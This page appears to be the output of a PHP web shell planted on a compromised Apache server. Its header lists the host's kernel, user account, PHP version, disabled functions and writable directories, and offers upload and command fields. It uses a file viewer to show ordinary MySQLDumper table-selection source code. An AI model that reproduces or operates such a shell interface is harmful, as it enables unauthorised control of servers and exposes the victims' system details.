Shadow-Here


Server : Apache
System : Linux methusalix2 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
User : hios ( 1437)
PHP Version : 5.6.40-0+deb8u12
Disable Function : proc_close,proc_open,dl,shell_exec,passthru
Directory :  /home/repuls/httpdocs/msd/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :
Current File : /home/repuls/httpdocs/msd/inc/tabellenabfrage.php
<?php
if (!defined('MSD_VERSION')) die('No direct access.');
include ( './language/' . $config['language'] . '/lang.php' );
include ( './language/' . $config['language'] . '/lang_dump.php' );
include ( './inc/template.php' );
$tblr=( $tblfrage_refer == 'dump' ) ? 'Backup' : 'Restore';
$filename=( isset($_GET['filename']) ) ? $_GET['filename'] : '';
if (isset($_POST['file'][0])) $filename=$_POST['file'][0];

ob_start();
$tpl=new MSDTemplate();
$sel_dump_encoding=isset($_POST['sel_dump_encoding']) ? $_POST['sel_dump_encoding'] : '';
$tpl=new MSDtemplate();

//Informationen zusammenstellen
if ($tblr == 'Backup')
{
	$tpl->set_filenames(array(
							'show' => './tpl/dump_select_tables.tpl'
	));
	$button_name='dump_tbl';
	//Info aus der Datenbank lesen
	MSD_mysql_connect();
	$res=mysql_query('SHOW TABLE STATUS FROM `' . $databases['db_actual'] . '`');
	$numrows=mysql_num_rows($res);
	$tbl_zeile='';
	for ($i=0; $i < $numrows; $i++)
	{
		$row=mysql_fetch_array($res,MYSQL_ASSOC);
		//v($row);	
		// Get nr of records -> need to do it this way because of incorrect returns when using InnoDBs
		$sql_2="SELECT count(*) as `count_records` FROM `" . $databases['db_actual'] . "`.`" . $row['Name'] . "`";
		$res2=@mysql_query($sql_2);
		if ($res2 === false)
		{
			$read_error='(' . mysql_errno() . ') ' . mysql_error();
			$row['Rows']='<span class="error">' . $lang['L_ERROR'] . ': ' . $read_error . '</span>';
		}
		else
		{
			$row2=@mysql_fetch_array($res2);
			$row['Rows']=$row2['count_records'];
		}
		
		$klasse=( $i % 2 ) ? 1 : '';
		$table_size=$row['Data_length'] + $row['Index_length'];
		$table_type=$row['Engine'];
		if (substr($row['Comment'],0,4) == 'VIEW')
		{
			$table_type='View';
			$table_size='-';
		}
		$tpl->assign_block_vars('ROW',array(
											
											'CLASS' => 'dbrow' . $klasse, 
											'ID' => $i, 
											'NR' => $i + 1, 
											'TABLENAME' => $row['Name'], 
											'TABLETYPE' => $table_type, 
											'RECORDS' => $table_type == 'View' ? '<i>' . $row['Rows'] . '</i>' : '<strong>' . $row['Rows'] . '</strong>', 
											'SIZE' => is_int($table_size) ? byte_output($table_size) : $table_size, 
											'LAST_UPDATE' => $row['Update_time']
		));
	}
}
else
{
	$tpl->set_filenames(array(
							
							'show' => './tpl/restore_select_tables.tpl'
	));
	//Restore - Header aus Backupfile lesen
	$button_name='restore_tbl';
	$gz=( substr($filename,-3) ) == '.gz' ? 1 : 0;
	if ($gz)
	{
		$fp=gzopen($fpath . $filename,"r");
		$statusline=gzgets($fp,40960);
		$offset=gztell($fp);
	}
	else
	{
		$fp=fopen($fpath . $filename,"r");
		$statusline=fgets($fp,5000);
		$offset=ftell($fp);
	}
	//Header auslesen
	$sline=ReadStatusline($statusline);
	
	$anzahl_tabellen=$sline['tables'];
	$anzahl_eintraege=$sline['records'];
	$tbl_zeile='';
	$part=( $sline['part'] == '' ) ? 0 : substr($sline['part'],3);
	if ($anzahl_eintraege == -1)
	{
		// not a backup of MySQLDumper
		$tpl->assign_block_vars('NO_MSD_BACKUP',array());
	}
	else
	{
		$tabledata=array();
		$i=0;
		//Tabellenfinos lesen
		gzseek($fp,$offset);
		$eof=false;
		WHILE (!$eof)
		{
			$line=$gz ? gzgets($fp,40960) : fgets($fp,40960);
			
			if (substr($line,0,9) == '-- TABLE|')
			{
				$d=explode('|',$line);
				$tabledata[$i]['name']=$d[1];
				$tabledata[$i]['records']=$d[2];
				$tabledata[$i]['size']=$d[3];
				$tabledata[$i]['update']=$d[4];
				$tabledata[$i]['engine']=isset($d[5]) ? $d[5] : '';
				$i++;
			}
			if (substr($line,0,6) == '-- EOF') $eof=true;
			if (substr(strtolower($line),0,6) == 'create') $eof=true;
		}
		for ($i=0; $i < sizeof($tabledata); $i++)
		{
			$klasse=( $i % 2 ) ? 1 : '';
			$tpl->assign_block_vars('ROW',array(
												
												'CLASS' => 'dbrow' . $klasse, 
												'ID' => $i, 
												'NR' => $i + 1, 
												'TABLENAME' => $tabledata[$i]['name'], 
												'RECORDS' => $tabledata[$i]['records'], 
												'SIZE' => byte_output($tabledata[$i]['size']), 
												'LAST_UPDATE' => $tabledata[$i]['update'], 
												'TABLETYPE' => $tabledata[$i]['engine']
			));
		}
	}
	if ($gz) gzclose($fp);
	else fclose($fp);
}

if (!isset($dk)) $dk='';

$confirm_restore=$lang['L_FM_ALERTRESTORE1'] . ' `' . $databases['db_actual'] . '`  ' . $lang['L_FM_ALERTRESTORE2'] . ' ' . $filename . ' ' . $lang['L_FM_ALERTRESTORE3'];

$tpl->assign_vars(array(
						
						'PAGETITLE' => $tblr . ' -' . $lang['L_TABLESELECTION'], 
						'L_NAME' => $lang['L_NAME'], 
						'L_DATABASE' => $lang['L_DB'], 
						'DATABASE' => $databases['db_actual'], 
						'L_LAST_UPDATE' => $lang['L_LASTBUFROM'], 
						'SEL_DUMP_ENCODING' => $sel_dump_encoding, 
						'FILENAME' => $filename, 
						'DUMP_COMMENT' => $dk, 
						'BUTTON_NAME' => $button_name, 
						'L_START_BACKUP' => $lang['L_STARTDUMP'], 
						'L_START_RESTORE' => $lang['L_FM_RESTORE'], 
						'L_ROWS' => $lang['L_INFO_RECORDS'], 
						'L_SIZE' => $lang['L_INFO_SIZE'], 
						'L_TABLE_TYPE' => $lang['L_TABLE_TYPE'], 
						'L_SELECT_ALL' => $lang['L_SELECTALL'], 
						'L_DESELECT_ALL' => $lang['L_DESELECTALL'], 
						'L_RESTORE' => $lang['L_RESTORE'], 
						'L_NO_MSD_BACKUP' => $lang['L_NOT_SUPPORTED'], 
						'L_CONFIRM_RESTORE' => $confirm_restore
));

$tpl->pparse('show');
ob_end_flush();
?>

Samx